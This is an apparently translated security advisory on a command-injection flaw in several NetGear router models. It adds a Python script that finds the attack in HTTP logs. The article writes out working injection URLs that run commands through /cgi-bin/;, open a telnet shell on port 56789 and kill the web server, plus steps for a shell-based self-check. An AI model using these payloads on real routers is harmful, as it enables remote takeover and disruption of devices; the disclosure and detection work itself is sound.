
NetGear routers are vulnerable

A serious vulnerability has been found in some models of NetGear routers that allows attackers to remotely execute Linux commands on the devices. To exploit it, attackers can send a specially crafted request to the router, delivering it through a pre-prepared web page.

A vulnerability, #582384, was recently found in NETGEAR routers that gives access to the command-line interface. In essence, a remote attacker can inject commands.

The vulnerability is quite simple to exploit; a request of the following form is enough.

http://[router_IP]/cgi-bin/;COMMAND 

That is, it is enough to specify the path to the cgi-bin directory on the router, put a semicolon after it, and then specify the commands to execute. For example:

http://[router-address]/cgi-bin/;uname$IFS-a - to display information about the router
http://[router-address]/cgi-bin/;telnetd$IFS-p$IFS'56789' - to start the telnet server
http://[router-address]/cgi-bin/;killall$IFS'httpd' - to terminate the web server process
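
For detection, the request shape described above (a semicolon directly after /cgi-bin/, with $IFS standing in for spaces) can be searched for in HTTP logs. The following is an added example, not part of the original article: it assumes requests to the router are recorded in common log format by a proxy or sensor, and the log lines, addresses and the status.cgi path are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path that starts with /cgi-bin/ followed directly by ';' (the injection point).
CGI_SEMICOLON = re.compile(r"^/cgi-bin/;(?P<cmd>.*)$", re.IGNORECASE)
# Common log format: host ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}|-)'
)

def classify(target):
    """Return the injected command string if target matches, else None."""
    # Drop scheme and host when a proxy logged an absolute URL.
    path = re.sub(r"^[a-z]+://[^/]+", "", target, flags=re.IGNORECASE)
    # Decode a bounded number of times so %3B and %253B both reveal ';'.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    m = CGI_SEMICOLON.match(path)
    if not m:
        return None
    # $IFS (or ${IFS}) replaces spaces in the request; expand it for the alert.
    return re.sub(r"\$\{?IFS\}?", " ", m.group("cmd"))

def scan(lines):
    """Return (source, time, command) for every log line matching the pattern."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            cmd = classify(m.group("target"))
            if cmd is not None:
                hits.append((m.group("src"), m.group("time"), cmd))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = r'''
192.168.1.23 - - [12/Dec/2016:10:01:44 +0000] "GET /start.htm HTTP/1.1" 200 5120
192.168.1.23 - - [12/Dec/2016:10:02:10 +0000] "GET /cgi-bin/;uname$IFS-a HTTP/1.1" 200 0
192.168.1.40 - - [12/Dec/2016:10:05:31 +0000] "GET /cgi-bin/%3Bkillall$IFS'httpd' HTTP/1.1" 200 0
192.168.1.40 - - [12/Dec/2016:10:06:02 +0000] "GET http://192.168.1.1/cgi-bin/;telnetd$IFS-p$IFS'56789' HTTP/1.1" 200 0
192.168.1.51 - - [12/Dec/2016:10:07:15 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 404 0
'''.strip().splitlines()

if __name__ == "__main__":
    for src, when, cmd in scan(SAMPLE_LOG):
        print(f"{when} {src} injected command: {cmd}")
```

Because the request is delivered through a web page opened by a user on the local network, the source address in a hit is the browser's host, not the attacker's.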

The following models of NetGear routers are subject to this vulnerability.

NetGear AC1750-Smart WiFi Router (Model R6400)
NetGear AC1900-Nighthawk Smart WiFi Router (Model R7000)
NetGear AC2300-Nighthawk Smart WiFi Router with MU-MIMO (Model R7000P)
NetGear AC2350-Nighthawk X4 AC 2350 Dual Band WiFi Router (Model R7500)
NetGear AC2600-Nighthawk X4S Smart WiFi Gaming Router (Model R7800)
NetGear AC3200-Nighthawk AC3200 Tri-Band WiFi Router (Model R8000)
NetGear AC5300-AC5300 Nighthawk X8 Tri-Band WiFi Router (Model R8500)
NetGear AD7200-Nighthawk X10 Smart WiFi Router (R9000)

To check the router's vulnerability, you can use the following instructions (Windows).

1. In the web browser, enter http://[router_IP]/cgi-bin/;telnetd$IFS-p$IFS'56789', substituting the router's IP address for router_IP.
2. Open the command prompt (Win + R > cmd).
3. On the command line, type the command telnet [router_IP] 56789, substituting the router's IP address for router_IP.
4. If the router is vulnerable, i.e., if the first command was successfully executed on it, you will see the welcome screen of the router's command shell. If an error message is displayed instead, the router's firmware is not vulnerable.
5. If the first command executed successfully, the telnet server process must be terminated. To do this, list the processes and pick out the right one with the command ps | grep telnet.
6. Then execute the command kill <process_id>, replacing process_id with the identifier of the telnet process returned by the previous command.

Users of vulnerable versions of routers should wait for the release of the corresponding patch and install it.

Be secure.

Source: https://habr.com/ru/post/317420/